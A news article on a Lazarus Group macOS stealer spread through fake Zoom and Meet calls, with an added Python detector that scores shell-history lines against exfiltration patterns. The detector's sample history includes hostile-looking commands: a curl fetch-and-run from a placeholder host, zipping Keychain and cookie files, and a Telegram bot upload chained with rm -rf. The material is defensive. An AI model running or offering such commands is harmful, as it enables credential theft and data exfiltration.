Security researchers have identified a new macOS malware campaign attributed to the Lazarus Group, the North Korea-linked hacking operation. The campaign, flagged on Tuesday, uses a malware kit known as "Mach-O Man" that is delivered through the ClickFix social-engineering technique, in which victims are talked into running commands themselves. According to Mauro Eldritch, an offensive security expert and founder of BCA Ltd., the malware targets traditional businesses as well as crypto companies.
Victims are lured into fake Zoom or Google Meet calls, where they are instructed to run a command that silently downloads the malware in the background. Because the victim executes the command in a terminal rather than opening a file that arrived through the browser, the download never carries the quarantine attribute that macOS uses to gate downloaded files, so the usual checks on downloaded software are never triggered. The result is unauthorized access to credentials and corporate systems, with consequences that can include account takeovers, intrusions into infrastructure, financial losses, and exposure of sensitive data.
The Lazarus Group has been implicated in some of the largest cryptocurrency thefts on record, including the $1.4 billion hack of the Bybit exchange in 2025, the largest theft in the industry to date. The "Mach-O Man" kit deploys a hidden stealer that harvests browser extension data, stored browser credentials, cookies, and macOS Keychain entries from compromised devices.
Once collected, the data is packed into a zip archive and sent to the attackers via Telegram. The kit also includes a self-deletion script that removes traces of itself with the system's rm command, using flags that suppress confirmation prompts. (Those flags skip the interactive prompt; they do not bypass file permissions, so the script can only delete what the victim's account can already delete.) Eldritch reconstructed the malware's behaviour using the macOS analysis environment of the cloud-based malware sandbox Any.run.
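The chain described above (a pasted download-and-run one-liner, access to Keychain and browser profile paths, archiving, exfiltration over Telegram, and self-deletion) leaves a recognisable trail in shell history. The following script, added here as an illustration and not taken from the article or from Eldritch's analysis, scores shell-history lines against generic indicator patterns for each of those stages and flags lines whose combined weight crosses a threshold. The patterns and the sample history are constructed for the example and are not the campaign's actual commands; the Telegram URL and the example.invalid host are placeholders.

```python
import re
from typing import Dict, List, Tuple

# Heuristic patterns for the stages of a ClickFix-style stealer chain.
# Each entry is (regex, weight). These are generic, constructed patterns
# for illustration, not indicators taken from the Mach-O Man kit itself.
INDICATORS: Dict[str, Tuple[re.Pattern, int]] = {
    # Download-and-execute one-liners: `curl ... | sh` or `bash -c "$(curl ...)"`.
    # Strong on its own, hence weight 2.
    "download_exec": (re.compile(
        r"(curl|wget)\b[^|;&]*\|\s*(ba|z)?sh\b"
        r"|(ba|z)?sh\s+-c\s+[\"']?\$\((curl|wget)", re.I), 2),
    # Inline decoding of an embedded payload.
    "base64_decode": (re.compile(r"base64\s+(-d|--decode|-D)\b", re.I), 1),
    # Keychain files or the `security` CLI used to read them.
    "keychain_access": (re.compile(
        r"Library/Keychains|\bsecurity\s+(find-|dump-)", re.I), 1),
    # Browser profile directories holding cookies and saved logins.
    "browser_profile": (re.compile(
        r"Library/Application Support/(Google/Chrome|BraveSoftware|Firefox)"
        r"|Library/Cookies", re.I), 1),
    # Archiving the loot before exfiltration.
    "archive": (re.compile(r"\bzip\s+-r|\bditto\s+-c\s+-k|\btar\s+-?c", re.I), 1),
    # Telegram Bot API endpoint used as the exfiltration channel (weight 2).
    "telegram_exfil": (re.compile(r"api\.telegram\.org/bot", re.I), 2),
    # Forced removal of the running script ($0) or a dropped .sh file.
    "self_delete": (re.compile(r"\brm\s+-r?f\b.*(\$0|\.sh\b)", re.I), 1),
}


def score_command(cmd: str) -> List[str]:
    """Return the names of every indicator that matches one shell command."""
    return [name for name, (pat, _w) in INDICATORS.items() if pat.search(cmd)]


def command_weight(cmd: str) -> int:
    """Sum the weights of all indicators matched by one command."""
    return sum(INDICATORS[name][1] for name in score_command(cmd))


def scan_history(lines: List[str], threshold: int = 2) -> List[dict]:
    """Flag history lines whose indicator weight reaches `threshold`.

    A lone `zip -r` or a single Keychain path is ordinary admin activity;
    a download-and-run one-liner, a Telegram upload, or a combination of
    credential paths, archiving and deletion is not.
    """
    hits = []
    for n, line in enumerate(lines, 1):
        cmd = line.strip()
        if not cmd:
            continue
        weight = command_weight(cmd)
        if weight >= threshold:
            hits.append({"line": n, "command": cmd,
                         "indicators": score_command(cmd), "weight": weight})
    return hits


# Constructed sample shell history for the example; line 2 is benign noise
# that shares one indicator (archiving) with the malicious lines.
SAMPLE_HISTORY = [
    "ls -la ~/Library",
    "zip -r backup.zip ~/Documents/project",
    'bash -c "$(curl -fsSL https://example.invalid/update.sh)"',
    'zip -r /tmp/out.zip ~/Library/Keychains '
    '"~/Library/Application Support/Google/Chrome/Default/Cookies"',
    'curl -s -F "document=@/tmp/out.zip" '
    'https://api.telegram.org/bot000:PLACEHOLDER/sendDocument?chat_id=1 '
    '&& rm -rf /tmp/out.zip "$0"',
]

if __name__ == "__main__":
    for hit in scan_history(SAMPLE_HISTORY):
        print(f"line {hit['line']} weight={hit['weight']} "
              f"{hit['indicators']}: {hit['command']}")
```

On a real host the input would be `~/.zsh_history` or `~/.bash_history` (note that zsh's extended history prefixes each line with `: <timestamp>:<elapsed>;`, which the regexes tolerate because they search anywhere in the line). The weighting is deliberately simple: the point is that the individual stages are common in legitimate use and only their co-occurrence, or the two strong indicators, should page an analyst.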
Earlier this year, North Korean hackers used AI-assisted social engineering to steal approximately $100,000 from a crypto wallet, a sign of how these actors' tactics continue to evolve. The ongoing threat posed by the Lazarus Group underlines the need for stronger security measures across the crypto and fintech sectors, including staff training against instructions to paste commands into a terminal, to defend against attacks of this kind.